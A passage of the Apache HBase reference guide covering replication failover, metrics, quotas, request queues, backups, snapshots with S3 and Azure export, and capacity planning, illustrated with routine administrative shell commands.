each of the source threads follows the read\/filter\/ship pattern.\nThe main difference is that those queues will never receive new data, since they do not belong to their new region server.\nWhen the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.\n\nGiven a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.\nThe region servers' znodes all contain a `peers` znode which contains a single queue.\nThe znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020, 123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n----\n\nAssume that 1.1.1.2 loses its ZooKeeper session.\nThe survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.\nIt will then start transferring all the queues to its local peers znode by appending the name of the dead server.\nRight before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1234 (Contains a position)\n 1.1.1.1,60020.1265\n 1.1.1.2,60020,123456790\/\n lock\n 2\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n 1.1.1.3,60020,123456630\/\n 2\/\n 1.1.1.3,60020.1280 (Contains a position)\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1214 (Contains a position)\n 1.1.1.2,60020.1248\n 1.1.1.2,60020.1312\n----\n\nSome time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.\nSome new logs were also created in the normal queues.\nThe last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.\nThe new layout will be:\n\n----\n\n\/hbase\/replication\/rs\/\n 1.1.1.1,60020,123456780\/\n 2\/\n 1.1.1.1,60020.1378 (Contains a position)\n\n 2-1.1.1.3,60020,123456630\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630\/\n 1.1.1.2,60020.1312 (Contains a position)\n 1.1.1.3,60020,123456630\/\n lock\n 2\/\n 1.1.1.3,60020.1325 (Contains a position)\n 1.1.1.3,60020.1401\n\n 2-1.1.1.2,60020,123456790\/\n 1.1.1.2,60020.1312 (Contains a position)\n----\n\n=== Replication Metrics\n\nThe following metrics are exposed at the global region server level and at the peer level:\n\n`source.sizeOfLogQueue`::\n number of WALs to process (excludes the one which is being processed) at the Replication source\n\n`source.shippedOps`::\n number of mutations shipped\n\n`source.logEditsRead`::\n number of mutations read from WALs at the replication source\n\n`source.ageOfLastShippedOp`::\n age of last batch that was shipped by the replication source\n\n`source.completedLogs`::\n The number of write-ahead-log files that have completed their acknowledged sending to the peer associated with this source. Increments to this metric are a part of normal operation of HBase replication.\n\n`source.completedRecoverQueues`::\n The number of recovery queues this source has completed sending to the associated peer. Increments to this metric are a part of normal recovery of HBase replication in the face of failed Region Servers.\n\n`source.uncleanlyClosedLogs`::\n The number of write-ahead-log files the replication system considered completed after reaching the end of readable entries in the face of an uncleanly closed file.\n\n`source.ignoredUncleanlyClosedLogContentsInBytes`::\n When a write-ahead-log file is not closed cleanly, there will likely be some entry that has been partially serialized. This metric contains the number of bytes of such entries the HBase replication system believes were remaining at the end of files skipped in the face of an uncleanly closed file. Those bytes should either be in different file or represent a client write that was not acknowledged.\n\n`source.restartedLogReading`::\n The number of times the HBase replication system detected that it failed to correctly parse a cleanly closed write-ahead-log file. In this circumstance, the system replays the entire log from the beginning, ensuring that no edits fail to be acknowledged by the associated peer. Increments to this metric indicate that the HBase replication system is having difficulty correctly handling failures in the underlying distributed storage system. No dataloss should occur, but you should check Region Server log files for details of the failures.\n\n`source.repeatedLogFileBytes`::\n When the HBase replication system determines that it needs to replay a given write-ahead-log file, this metric is incremented by the number of bytes the replication system believes had already been acknowledged by the associated peer prior to starting over.\n\n`source.closedLogsWithUnknownFileLength`::\n Incremented when the HBase replication system believes it is at the end of a write-ahead-log file but it can not determine the length of that file in the underlying distributed storage system. Could indicate dataloss since the replication system is unable to determine if the end of readable entries lines up with the expected end of the file. You should check Region Server log files for details of the failures.\n\n\n=== Replication Configuration Options\n\n[cols=\"1,1,1\", options=\"header\"]\n|===\n| Option\n| Description\n| Default\n\n| zookeeper.znode.parent\n| The name of the base ZooKeeper znode used for HBase\n| \/hbase\n\n| zookeeper.znode.replication\n| The name of the base znode used for replication\n| replication\n\n| zookeeper.znode.replication.peers\n| The name of the peer znode\n| peers\n\n| zookeeper.znode.replication.peers.state\n| The name of peer-state znode\n| peer-state\n\n| zookeeper.znode.replication.rs\n| The name of the rs znode\n| rs\n\n| replication.sleep.before.failover\n| How many milliseconds a worker should sleep before attempting to replicate\n a dead region server's WAL queues.\n|\n\n| replication.executor.workers\n| The number of region servers a given region server should attempt to\n failover simultaneously.\n| 1\n|===\n\n=== Monitoring Replication Status\n\nYou can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:\n* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.\n* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.\n* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.\n\n== Running Multiple Workloads On a Single Cluster\n\nHBase provides the following mechanisms for managing the performance of a cluster\nhandling multiple workloads:\n. <<quota>>\n. <<request_queues>>\n. <<multiple-typed-queues>>\n\n[[quota]]\n=== Quotas\nHBASE-11598 introduces RPC quotas, which allow you to throttle requests based on\nthe following limits:\n\n. <<request-quotas,The number or size of requests(read, write, or read+write) in a given timeframe>>\n. <<namespace_quotas,The number of tables allowed in a namespace>>\n\nThese limits can be enforced for a specified user, table, or namespace.\n\n.Enabling Quotas\n\nQuotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`\nproperty to `true` in _hbase-site.xml_ file for all cluster nodes.\n\n.General Quota Syntax\n. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type(read + write).\n. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`\n. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),\n`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)\n. Numbers of requests are expressed as an integer followed by the string `req`\n. Limits relating to time are expressed as req\/time or size\/time. For instance `10req\/day`\nor `100P\/hour`.\n. Numbers of tables or regions are expressed as integers.\n\n[[request-quotas]]\n.Setting Request Quotas\nYou can set quota rules ahead of time, or you can change the throttle at runtime. The change\nwill propagate after the quota refresh period has expired. This expiration period\ndefaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property\nin `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.\n\n----\n# Limit user u1 to 10 requests per second\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 read requests per second\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req\/sec'\n\n# Limit user u1 to 10 M per day everywhere\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M\/day'\n\n# Limit user u1 to 10 M write size per sec\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M\/sec'\n\n# Limit user u1 to 5k per minute on table t2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K\/min'\n\n# Limit user u1 to 10 read requests per sec on table t2\nhbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req\/sec'\n\n# Remove an existing limit from user u1 on namespace ns2\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE\n\n# Limit all users to 10 requests per hour on namespace ns1\nhbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req\/hour'\n\n# Limit all users to 10 T per hour on table t1\nhbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T\/hour'\n\n# Remove all existing limits from user u1\nhbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE\n\n# List all quotas for user u1 in namespace ns2\nhbase> list_quotas USER => 'u1, NAMESPACE => 'ns2'\n\n# List all quotas for namespace ns2\nhbase> list_quotas NAMESPACE => 'ns2'\n\n# List all quotas for table t1\nhbase> list_quotas TABLE => 't1'\n\n# list all quotas\nhbase> list_quotas\n----\n\nYou can also place a global limit and exclude a user or a table from the limit by applying the\n`GLOBAL_BYPASS` property.\n----\nhbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req\/min' # a per-namespace request limit\nhbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit\n----\n\n[[namespace_quotas]]\n.Setting Namespace Quotas\n\nYou can specify the maximum number of tables or regions allowed in a given namespace, either\nwhen you create the namespace or by altering an existing namespace, by setting the\n`hbase.namespace.quota.maxtables property` on the namespace.\n\n.Limiting Tables Per Namespace\n----\n# Create a namespace with a max of 5 tables\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}\n\n# Alter an existing namespace to have a max of 8 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns2'\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}\n----\n\n.Limiting Regions Per Namespace\n----\n# Create a namespace with a max of 10 regions\nhbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'\n\n# Show quota information for a namespace\nhbase> describe_namespace 'ns1'\n\n# Alter an existing namespace to have a max of 20 tables\nhbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}\n\n# Alter an existing namespace to remove a quota\nhbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}\n----\n\n[[request_queues]]\n=== Request Queues\nIf no throttling policy is configured, when the RegionServer receives multiple requests,\nthey are now placed into a queue waiting for a free execution slot (HBASE-6721).\nThe simplest queue is a FIFO queue, where each request waits for all previous requests in the queue\nto finish before running. Fast or interactive queries can get stuck behind large requests.\n\nIf you are able to guess how long a request will take, you can reorder requests by\npushing the long requests to the end of the queue and allowing short requests to preempt\nthem. Eventually, you must still execute the large requests and prioritize the new\nrequests behind them. The short requests will be newer, so the result is not terrible,\nbut still suboptimal compared to a mechanism which allows large requests to be split\ninto multiple smaller ones.\n\nHBASE-10993 introduces such a system for deprioritizing long-running scanners. There\nare two types of queues, `fifo` and `deadline`. To configure the type of queue used,\nconfigure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There\nis no way to estimate how long each request may take, so de-prioritization only affects\nscans, and is based on the number of \u201cnext\u201d calls a scan request has made. An assumption\nis made that when you are doing a full table scan, your job is not likely to be interactive,\nso if there are concurrent requests, you can delay long-running scans up to a limit tunable by\nsetting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated\nby a simple square root of `(numNextCall * weight)` where the weight is\nconfigurable by setting the `hbase.ipc.server.scan.vtime.weight` property.\n\n[[multiple-typed-queues]]\n=== Multiple-Typed Queues\n\nYou can also prioritize or deprioritize different kinds of requests by configuring\na specified number of dedicated handlers and queues. You can segregate the scan requests\nin a single queue with a single handler, and all the other available queues can service\nshort `Get` requests.\n\nYou can adjust the IPC queues and handlers based on the type of workload, using static\ntuning options. This approach is an interim first step that will eventually allow\nyou to change the settings at runtime, and to dynamically adjust values based on the load.\n\n.Multiple Queues\n\nTo avoid contention and separate different kinds of requests, configure the\n`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of\nqueues and control how many handlers can share the same queue., allows admins to increase the number\nof queues and decide how many handlers share the same queue.\n\nUsing more queues reduces contention when adding a task to a queue or selecting it\nfrom a queue. You can even configure one queue per handler. The trade-off is that\nif some queues contain long-running tasks, a handler may need to wait to execute from that queue\nrather than stealing from another queue which has waiting tasks.\n\n.Read and Write Queues\nWith multiple queues, you can now divide read and write requests, giving more priority\n(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`\nproperty to choose to serve more reads or more writes.\n\n.Get and Scan Queues\nSimilar to the read\/write split, you can split gets and scans by tuning the `hbase.ipc.server.callqueue.scan.ratio`\nproperty to give more priority to gets or to scans. A scan ratio of `0.1` will give\nmore queue\/handlers to the incoming gets, which means that more gets can be processed\nat the same time and that fewer scans can be executed at the same time. A value of\n`0.9` will give more queue\/handlers to scans, so the number of scans executed will\nincrease and the number of gets will decrease.\n\n[[space-quotas]]\n=== Space Quotas\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-16961[HBASE-16961] introduces a new type of\nquotas for HBase to leverage: filesystem quotas. These \"space\" quotas limit the amount of space\non the filesystem that HBase namespaces and tables can consume. If a user, malicious or ignorant,\nhas the ability to write data into HBase, with enough time, that user can effectively crash HBase\n(or worse HDFS) by consuming all available space. When there is no filesystem space available,\nHBase crashes because it can no longer create\/sync data to the write-ahead log.\n\nThis feature allows a for a limit to be set on the size of a table or namespace. When a space quota is set\non a namespace, the quota's limit applies to the sum of usage of all tables in that namespace.\nWhen a table with a quota exists in a namespace with a quota, the table quota takes priority\nover the namespace quota. This allows for a scenario where a large limit can be placed on\na collection of tables, but a single table in that collection can have a fine-grained limit set.\n\nThe existing `set_quota` and `list_quota` HBase shell commands can be used to interact with\nspace quotas. Space quotas are quotas with a `TYPE` of `SPACE` and have `LIMIT` and `POLICY`\nattributes. The `LIMIT` is a string that refers to the amount of space on the filesystem\nthat the quota subject (e.g. the table or namespace) may consume. For example, valid values\nof `LIMIT` are `'10G'`, `'2T'`, or `'256M'`. The `POLICY` refers to the action that HBase will\ntake when the quota subject's usage exceeds the `LIMIT`. The following are valid `POLICY` values.\n\n* `NO_INSERTS` - No new data may be written (e.g. `Put`, `Increment`, `Append`).\n* `NO_WRITES` - Same as `NO_INSERTS` but `Deletes` are also disallowed.\n* `NO_WRITES_COMPACTIONS` - Same as `NO_WRITES` but compactions are also disallowed.\n* `DISABLE` - The table(s) are disabled, preventing all read\/write access.\n\n.Setting simple space quotas\n----\n# Sets a quota on the table 't1' with a limit of 1GB, disallowing Puts\/Increments\/Appends when the table exceeds 1GB\nhbase> set_quota TYPE => SPACE, TABLE => 't1', LIMIT => '1G', POLICY => NO_INSERTS\n\n# Sets a quota on the namespace 'ns1' with a limit of 50TB, disallowing Puts\/Increments\/Appends\/Deletes\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '50T', POLICY => NO_WRITES\n\n# Sets a quota on the table 't3' with a limit of 2TB, disallowing any writes and compactions when the table exceeds 2TB.\nhbase> set_quota TYPE => SPACE, TABLE => 't3', LIMIT => '2T', POLICY => NO_WRITES_COMPACTIONS\n\n# Sets a quota on the table 't2' with a limit of 50GB, disabling the table when it exceeds 50GB\nhbase> set_quota TYPE => SPACE, TABLE => 't2', LIMIT => '50G', POLICY => DISABLE\n----\n\nConsider the following scenario to set up quotas on a namespace, overriding the quota on tables in that namespace\n\n.Table and Namespace space quotas\n----\nhbase> create_namespace 'ns1'\nhbase> create 'ns1:t1'\nhbase> create 'ns1:t2'\nhbase> create 'ns1:t3'\nhbase> set_quota TYPE => SPACE, NAMESPACE => 'ns1', LIMIT => '100T', POLICY => NO_INSERTS\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t2', LIMIT => '200G', POLICY => NO_WRITES\nhbase> set_quota TYPE => SPACE, TABLE => 'ns1:t3', LIMIT => '20T', POLICY => NO_WRITES\n----\n\nIn the above scenario, the tables in the namespace `ns1` will not be allowed to consume more than\n100TB of space on the filesystem among each other. The table 'ns1:t2' is only allowed to be 200GB in size, and will\ndisallow all writes when the usage exceeds this limit. The table 'ns1:t3' is allowed to grow to 20TB in size\nand also will disallow all writes then the usage exceeds this limit. Because there is no table quota\non 'ns1:t1', this table can grow up to 100TB, but only if 'ns1:t2' and 'ns1:t3' have a usage of zero bytes.\nPractically, it's limit is 100TB less the current usage of 'ns1:t2' and 'ns1:t3'.\n\n[[ops.space.quota.deletion]]\n=== Disabling Automatic Space Quota Deletion\n\nBy default, if a table or namespace is deleted that has a space quota, the quota itself is\nalso deleted. In some cases, it may be desirable for the space quota to not be automatically deleted.\nIn these cases, the user may configure the system to not delete any space quota automatically via hbase-site.xml.\n\n[source,java]\n----\n\n <property>\n <name>hbase.master.quota.observer.ignore<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n=== HBase Snapshots with Space Quotas\n\nOne common area of unintended-filesystem-use with HBase is via HBase snapshots. Because snapshots\nexist outside of the management of HBase tables, it is not uncommon for administrators to suddenly\nrealize that hundreds of gigabytes or terabytes of space is being used by HBase snapshots which were\nforgotten and never removed.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-17748[HBASE-17748] is the umbrella JIRA issue which\nexpands on the original space quota functionality to also include HBase snapshots. While this is a confusing\nsubject, the implementation attempts to present this support in as reasonable and simple of a manner as\npossible for administrators. This feature does not make any changes to administrator interaction with\nspace quotas, only in the internal computation of table\/namespace usage. Table and namespace usage will\nautomatically incorporate the size taken by a snapshot per the rules defined below.\n\nAs a review, let's cover a snapshot's lifecycle: a snapshot is metadata which points to\na list of HFiles on the filesystem. This is why creating a snapshot is a very cheap operation; no HBase\ntable data is actually copied to perform a snapshot. Cloning a snapshot into a new table or restoring\na table is a cheap operation for the same reason; the new table references the files which already exist\non the filesystem without a copy. To include snapshots in space quotas, we need to define which table\n\"owns\" a file when a snapshot references the file (\"owns\" refers to encompassing the filesystem usage\nof that file).\n\nConsider a snapshot which was made against a table. When the snapshot refers to a file and the table no\nlonger refers to that file, the \"originating\" table \"owns\" that file. When multiple snapshots refer to\nthe same file and no table refers to that file, the snapshot with the lowest-sorting name (lexicographically)\nis chosen and the table which that snapshot was created from \"owns\" that file. HFiles are not \"double-counted\"\n hen a table and one or more snapshots refer to that HFile.\n\nWhen a table is \"rematerialized\" (via `clone_snapshot` or `restore_snapshot`), a similar problem of file\nownership arises. In this case, while the rematerialized table references a file which a snapshot also\nreferences, the table does not \"own\" the file. The table from which the snapshot was created still \"owns\"\nthat file. When the rematerialized table is compacted or the snapshot is deleted, the rematerialized table\nwill uniquely refer to a new file and \"own\" the usage of that file. Similarly, when a table is duplicated via a snapshot\nand `restore_snapshot`, the new table will not consume any quota size until the original table stops referring\nto the files, either due to a compaction on the original table, a compaction on the new table, or the\noriginal table being deleted.\n\nOne new HBase shell command was added to inspect the computed sizes of each snapshot in an HBase instance.\n\n----\nhbase> list_snapshot_sizes\nSNAPSHOT SIZE\n t1.s1 1159108\n----\n\n[[ops.backup]]\n== HBase Backup\n\nThere are two broad strategies for performing HBase backups: backing up with a full cluster shutdown, and backing up on a live cluster.\nEach approach has pros and cons.\n\nFor additional information, see link:http:\/\/blog.sematext.com\/2011\/03\/11\/hbase-backup-options\/[HBase Backup\n Options] over on the Sematext Blog.\n\n[[ops.backup.fullshutdown]]\n=== Full Shutdown Backup\n\nSome environments can tolerate a periodic full shutdown of their HBase cluster, for example if it is being used a back-end analytic capacity and not serving front-end web-pages.\nThe benefits are that the NameNode\/Master are RegionServers are down, so there is no chance of missing any in-flight changes to either StoreFiles or metadata.\nThe obvious con is that the cluster is down.\nThe steps include:\n\n[[ops.backup.fullshutdown.stop]]\n==== Stop HBase\n\n\n\n[[ops.backup.fullshutdown.distcp]]\n==== Distcp\n\nDistcp could be used to either copy the contents of the HBase directory in HDFS to either the same cluster in another directory, or to a different cluster.\n\nNote: Distcp works in this situation because the cluster is down and there are no in-flight edits to files.\nDistcp-ing of files in the HBase directory is not generally recommended on a live cluster.\n\n[[ops.backup.fullshutdown.restore]]\n==== Restore (if needed)\n\nThe backup of the hbase directory from HDFS is copied onto the 'real' hbase directory via distcp.\nThe act of copying these files creates new HDFS metadata, which is why a restore of the NameNode edits from the time of the HBase backup isn't required for this kind of restore, because it's a restore (via distcp) of a specific HDFS directory (i.e., the HBase part) not the entire HDFS file-system.\n\n[[ops.backup.live.replication]]\n=== Live Cluster Backup - Replication\n\nThis approach assumes that there is a second cluster.\nSee the HBase page on link:https:\/\/hbase.apache.org\/book.html#_cluster_replication[replication] for more information.\n\n[[ops.backup.live.copytable]]\n=== Live Cluster Backup - CopyTable\n\nThe <<copy.table,copytable>> utility could either be used to copy data from one table to another on the same cluster, or to copy data to another table on another cluster.\n\nSince the cluster is up, there is a risk that edits could be missed in the copy process.\n\n[[ops.backup.live.export]]\n=== Live Cluster Backup - Export\n\nThe <<export,export>> approach dumps the content of a table to HDFS on the same cluster.\nTo restore the data, the <<import,import>> utility would be used.\n\nSince the cluster is up, there is a risk that edits could be missed in the export process.\n\n[[ops.snapshots]]\n== HBase Snapshots\n\nHBase Snapshots allow you to take a snapshot of a table without too much impact on Region Servers.\nSnapshot, Clone and restore operations don't involve data copying.\nAlso, Exporting the snapshot to another cluster doesn't have impact on the Region Servers.\n\nPrior to version 0.94.6, the only way to backup or to clone a table is to use CopyTable\/ExportTable, or to copy all the hfiles in HDFS after disabling the table.\nThe disadvantages of these methods are that you can degrade region server performance (Copy\/Export Table) or you need to disable the table, that means no reads or writes; and this is usually unacceptable.\n\n[[ops.snapshots.configuration]]\n=== Configuration\n\nTo turn on the snapshot support just set the `hbase.snapshot.enabled` property to true.\n(Snapshots are enabled by default in 0.95+ and off by default in 0.94.6+)\n\n[source,java]\n----\n\n <property>\n <name>hbase.snapshot.enabled<\/name>\n <value>true<\/value>\n <\/property>\n----\n\n[[ops.snapshots.takeasnapshot]]\n=== Take a Snapshot\n\nYou can take a snapshot of a table regardless of whether it is enabled or disabled.\nThe snapshot operation doesn't involve any data copying.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> snapshot 'myTable', 'myTableSnapshot-122112'\n----\n\n.Take a Snapshot Without Flushing\nThe default behavior is to perform a flush of data in memory before the snapshot is taken.\nThis means that data in memory is included in the snapshot.\nIn most cases, this is the desired behavior.\nHowever, if your set-up can tolerate data in memory being excluded from the snapshot, you can use the `SKIP_FLUSH` option of the `snapshot` command to disable and flushing while taking the snapshot.\n\n----\nhbase> snapshot 'mytable', 'snapshot123', {SKIP_FLUSH => true}\n----\n\nWARNING: There is no way to determine or predict whether a very concurrent insert or update will be included in a given snapshot, whether flushing is enabled or disabled.\nA snapshot is only a representation of a table during a window of time.\nThe amount of time the snapshot operation will take to reach each Region Server may vary from a few seconds to a minute, depending on the resource load and speed of the hardware or network, among other factors.\nThere is also no way to know whether a given insert or update is in memory or has been flushed.\n\n[[ops.snapshots.list]]\n=== Listing Snapshots\n\nList all snapshots taken (by printing the names and relative information).\n\n----\n\n$ .\/bin\/hbase shell\nhbase> list_snapshots\n----\n\n[[ops.snapshots.delete]]\n=== Deleting Snapshots\n\nYou can remove a snapshot, and the files retained for that snapshot will be removed if no longer needed.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> delete_snapshot 'myTableSnapshot-122112'\n----\n\n[[ops.snapshots.clone]]\n=== Clone a table from snapshot\n\nFrom a snapshot you can create a new table (clone operation) with the same data that you had when the snapshot was taken.\nThe clone operation, doesn't involve data copies, and a change to the cloned table doesn't impact the snapshot or the original table.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> clone_snapshot 'myTableSnapshot-122112', 'myNewTestTable'\n----\n\n[[ops.snapshots.restore]]\n=== Restore a snapshot\n\nThe restore operation requires the table to be disabled, and the table will be restored to the state at the time when the snapshot was taken, changing both data and schema if required.\n\n----\n\n$ .\/bin\/hbase shell\nhbase> disable 'myTable'\nhbase> restore_snapshot 'myTableSnapshot-122112'\n----\n\nNOTE: Since Replication works at log level and snapshots at file-system level, after a restore, the replicas will be in a different state from the master.\nIf you want to use restore, you need to stop replication and redo the bootstrap.\n\nIn case of partial data-loss due to misbehaving client, instead of a full restore that requires the table to be disabled, you can clone the table from the snapshot and use a Map-Reduce job to copy the data that you need, from the clone to the main one.\n\n[[ops.snapshots.acls]]\n=== Snapshots operations and ACLs\n\nIf you are using security with the AccessController Coprocessor (See <<hbase.accesscontrol.configuration,hbase.accesscontrol.configuration>>), only a global administrator can take, clone, or restore a snapshot, and these actions do not capture the ACL rights.\nThis means that restoring a table preserves the ACL rights of the existing table, while cloning a table creates a new table that has no ACL rights until the administrator adds them.\n\n[[ops.snapshots.export]]\n=== Export to another cluster\n\nThe ExportSnapshot tool copies all the data related to a snapshot (hfiles, logs, snapshot metadata) to another cluster.\nThe tool executes a Map-Reduce job, similar to distcp, to copy files between the two clusters, and since it works at file-system level the hbase cluster does not have to be online.\n\nTo copy a snapshot called MySnapshot to an HBase cluster srv2 (hdfs:\/\/\/srv2:8082\/hbase) using 16 mappers:\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16\n----\n\n.Limiting Bandwidth Consumption\nYou can limit the bandwidth consumption when exporting a snapshot, by specifying the `-bandwidth` parameter, which expects an integer representing megabytes per second.\nThe following example limits the above example to 200 MB\/sec.\n\n[source,bourne]\n----\n$ bin\/hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot -snapshot MySnapshot -copy-to hdfs:\/\/srv2:8082\/hbase -mappers 16 -bandwidth 200\n----\n\n[[snapshots_s3]]\n=== Storing Snapshots in an Amazon S3 Bucket\n\nYou can store and retrieve snapshots from Amazon S3, using the following procedure.\n\nNOTE: You can also store snapshots in Microsoft Azure Blob Storage. See <<snapshots_azure>>.\n\n.Prerequisites\n- You must be using HBase 1.0 or higher and Hadoop 2.6.1 or higher, which is the first\nconfiguration that uses the Amazon AWS SDK.\n- You must use the `s3a:\/\/` protocol to connect to Amazon S3. The older `s3n:\/\/`\nand `s3:\/\/` protocols have various limitations and do not use the Amazon AWS SDK.\n- The `s3a:\/\/` URI must be configured and available on the server where you run\nthe commands to export and restore the snapshot.\n\nAfter you have fulfilled the prerequisites, take the snapshot like you normally would.\nAfterward, you can export it using the `org.apache.hadoop.hbase.snapshot.ExportSnapshot`\ncommand like the one below, substituting your own `s3a:\/\/` path in the `copy-from`\nor `copy-to` directive and substituting or modifying other options as required:\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot \\\n -copy-from hdfs:\/\/srv2:8082\/hbase \\\n -copy-to s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.ExportSnapshot \\\n -snapshot MySnapshot\n -copy-from s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -copy-to hdfs:\/\/srv2:8082\/hbase \\\n -chuser MyUser \\\n -chgroup MyGroup \\\n -chmod 700 \\\n -mappers 16\n----\n\nYou can also use the `org.apache.hadoop.hbase.snapshot.SnapshotInfo` utility with the `s3a:\/\/` path by including the\n`-remote-dir` option.\n\n----\n$ hbase org.apache.hadoop.hbase.snapshot.SnapshotInfo \\\n -remote-dir s3a:\/\/<bucket>\/<namespace>\/hbase \\\n -list-snapshots\n----\n\n[[snapshots_azure]]\n== Storing Snapshots in Microsoft Azure Blob Storage\n\nYou can store snapshots in Microsoft Azure Blog Storage using the same techniques\nas in <<snapshots_s3>>.\n\n.Prerequisites\n- You must be using HBase 1.2 or higher with Hadoop 2.7.1 or\n higher. No version of HBase supports Hadoop 2.7.0.\n- Your hosts must be configured to be aware of the Azure blob storage filesystem.\n See https:\/\/hadoop.apache.org\/docs\/r2.7.1\/hadoop-azure\/index.html.\n\nAfter you meet the prerequisites, follow the instructions\nin <<snapshots_s3>>, replacingthe protocol specifier with `wasb:\/\/` or `wasbs:\/\/`.\n\n[[ops.capacity]]\n== Capacity Planning and Region Sizing\n\nThere are several considerations when planning the capacity for an HBase cluster and performing the initial configuration.\nStart with a solid understanding of how HBase handles data internally.\n\n[[ops.capacity.nodes]]\n=== Node count and hardware\/VM configuration\n\n[[ops.capacity.nodes.datasize]]\n==== Physical data size\n\nPhysical data size on disk is distinct from logical size of your data and is affected by the following:\n\n* Increased by HBase overhead\n+\n* See <<keyvalue,keyvalue>> and <<keysize,keysize>>.\n At least 24 bytes per key-value (cell), can be more.\n Small keys\/values means more relative overhead.\n* KeyValue instances are aggregated into blocks, which are indexed.\n Indexes also have to be stored.\n Blocksize is configurable on a per-ColumnFamily basis.\n See <<regions.arch,regions.arch>>.\n\n* Decreased by <<compression,compression>> and data block encoding, depending on data.\n See also link:http:\/\/search-hadoop.com\/m\/lL12B1PFVhp1[this thread].\n You might want to test what compression and encoding (if any) make sense for your data.\n* Increased by size of region server <<wal,wal>> (usually fixed and negligible - less than half of RS memory size, per RS).\n* Increased by HDFS replication - usually x3.\n\nAside from the disk space necessary to store the data, one RS may not be able to serve arbitrarily large amounts of data due to some practical limits on region count and size (see <<ops.capacity.regions,ops.capacity.regions>>).\n\n[[ops.capacity.nodes.throughput]]\n==== Read\/Write throughput\n\nNumber of nodes can also be driven by required throughput for reads and\/or writes.\nThe throughput one can get per node depends a lot on data (esp.\nkey\/value sizes) and request patterns, as well as node and system configuration.\nPlanning should be done for peak load if it is likely that the load would be the main driver of the increase of the node count.\nPerformanceEvaluation and <<ycsb,ycsb>> tools can be used to test single node or a test cluster.\n\nFor write, usually 